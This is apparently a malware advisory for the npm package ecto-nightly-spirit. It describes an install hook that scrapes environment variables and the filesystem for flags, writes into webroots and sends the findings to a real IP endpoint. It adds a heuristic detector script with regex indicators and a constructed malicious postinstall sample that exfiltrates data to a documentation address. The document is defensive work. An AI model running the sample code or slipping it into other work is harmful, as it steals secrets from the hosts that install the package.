npm

ecto-nightly-spirit @1.1.0

Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC

Malicious

OSV ID

MAL-2026-5688

Ecosystem

npm

Summary

On npm install, postinstall.js executes unconditionally and performs three actions that harm the installing host. (1) It enumerates every key/value pair in process.env and scans the values for HTB{...} flag patterns (postinstall.js:42-45). (2) It reads a hardcoded list of absolute filesystem paths (/flag.txt, /root/flag.txt, /app/flag.txt, etc.) and shells out via /bin/sh -c 'grep -Rao 'HTB{[^}]*}' /app /tmp /root /home /opt /usr/src' to recursively scan the installer's filesystem (postinstall.js:65). (3) It HTTP-PUTs the discovered string (or a NOFLAG uid=... cwd=... fallback containing host identifiers) to the hardcoded bare-IP endpoint http://154.57.164.70:30569/api/modules/ECT-472839 over plain HTTP, so the exfiltrated data is also readable by anyone on the network path. Additionally, postinstall.js:13-25 and :104-109 write attacker-chosen content into common web document roots (/usr/share/nginx/html/flag.txt, /var/www/html/flag.txt, /app/public/flag.txt, etc.), creating a public leak channel on any installer machine that also serves a webroot. Although the package self-describes as a 'CTF payload for verdaccio supply-chain testing', publishing it to the public npm registry exposes any installer (CI runner, developer machine, container build) to environment scraping, filesystem search, host-info exfiltration, and webroot poisoning. The code runs with the privileges of whoever invokes npm install, so a root-owned container build or a CI runner with deployment secrets in its environment is the worst case.
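The behaviours in the summary (an install hook, environment enumeration, a recursive grep via the shell, a hard-coded bare-IP endpoint, writes into web document roots, CTF flag patterns) are all recognisable before the hook ever runs. The following is an added example, not code from the OSV record, from Amazon Inspector or from the package itself: a heuristic pre-install audit that reads a package's manifest and the files its install hooks reference and flags those indicators. The package.json and postinstall.js embedded below are constructed stand-ins that imitate the described behaviour (with a documentation-range IP address), not the real package contents; the indicator list and the allow/review/block verdicts are this example's own choices.

```javascript
// Heuristic audit of an npm package's install hooks for the indicators
// described in MAL-2026-5688. Added example; not the project's own code.

// npm lifecycle scripts that run during a plain `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator is a regex plus a short explanation for the report.
const INDICATORS = [
  { id: "env-enumeration",
    re: /Object\.(?:keys|entries|values)\(\s*process\.env\s*\)|for\s*\(\s*(?:const|let|var)\s+\w+\s+in\s+process\.env/,
    why: "enumerates every environment variable" },
  { id: "shell-grep-fs",
    re: /(?:exec|execSync|spawn|spawnSync)\s*\([^)]*grep\s+-[A-Za-z]*[Rr]/,
    why: "shells out to grep recursively over the filesystem" },
  { id: "bare-ip-endpoint",
    re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/,
    why: "contacts a hard-coded bare-IP endpoint" },
  { id: "webroot-write",
    re: /\/(?:usr\/share\/nginx\/html|var\/www\/html|app\/public)\//,
    why: "touches a web document root" },
  { id: "ctf-flag-pattern",
    re: /HTB\\?\{/,
    why: "searches for CTF flag patterns" },
];

// Return the install hooks a manifest declares, with their commands.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Match every indicator against one piece of source text.
function scanSource(name, source) {
  const findings = [];
  for (const ind of INDICATORS) {
    const m = source.match(ind.re);
    if (m) findings.push({ file: name, id: ind.id, why: ind.why, evidence: m[0] });
  }
  return findings;
}

// pkg: parsed package.json; files: { relativePath: sourceText } for the tarball.
// Verdict: "allow" (no hooks), "review" (hooks, no indicators), "block" (indicators hit).
function auditPackage(pkg, files) {
  const hooks = findInstallHooks(pkg);
  const findings = [];
  for (const { hook, command } of hooks) {
    // The hook command itself may carry an inline payload (e.g. `node -e ...`).
    findings.push(...scanSource(`scripts.${hook}`, command));
    // Scan every shipped file the command names.
    for (const [name, source] of Object.entries(files)) {
      if (command.includes(name)) findings.push(...scanSource(name, source));
    }
  }
  const verdict = findings.length > 0 ? "block" : hooks.length > 0 ? "review" : "allow";
  return { hooks, findings, verdict };
}

// Constructed sample imitating the reported behaviour (192.0.2.10 is a
// documentation address, not the real endpoint from the report).
const SAMPLE_PACKAGE_JSON = {
  name: "constructed-sample", version: "0.0.0",
  scripts: { postinstall: "node postinstall.js" },
};
const SAMPLE_FILES = {
  "postinstall.js": [
    "const { execSync } = require('child_process');",
    "const http = require('http');",
    "const fs = require('fs');",
    "let hit = null;",
    "for (const [k, v] of Object.entries(process.env)) {",
    "  const m = String(v).match(/HTB\\{[^}]*\\}/); if (m) hit = m[0];",
    "}",
    "if (!hit) { try { hit = execSync(\"grep -Rao 'HTB{[^}]*}' /app /tmp\").toString(); } catch (e) {} }",
    "fs.writeFileSync('/var/www/html/flag.txt', hit || 'NOFLAG');",
    "http.request('http://192.0.2.10:30569/api/modules/X', { method: 'PUT' }).end(hit || 'NOFLAG');",
  ].join("\n"),
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

Pattern matching of this kind is a triage aid, not a control: a minified or string-built payload will slip past these regexes. The dependable mitigation for CI and container builds is to set ignore-scripts=true in .npmrc (or pass --ignore-scripts) so no lifecycle script runs by default, and to allow specific packages' build steps explicitly after review.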

Source: amazon-inspector (5dea0702101217f4a918a23191023bbd9e7d3b5478028bb0868341a574526e97)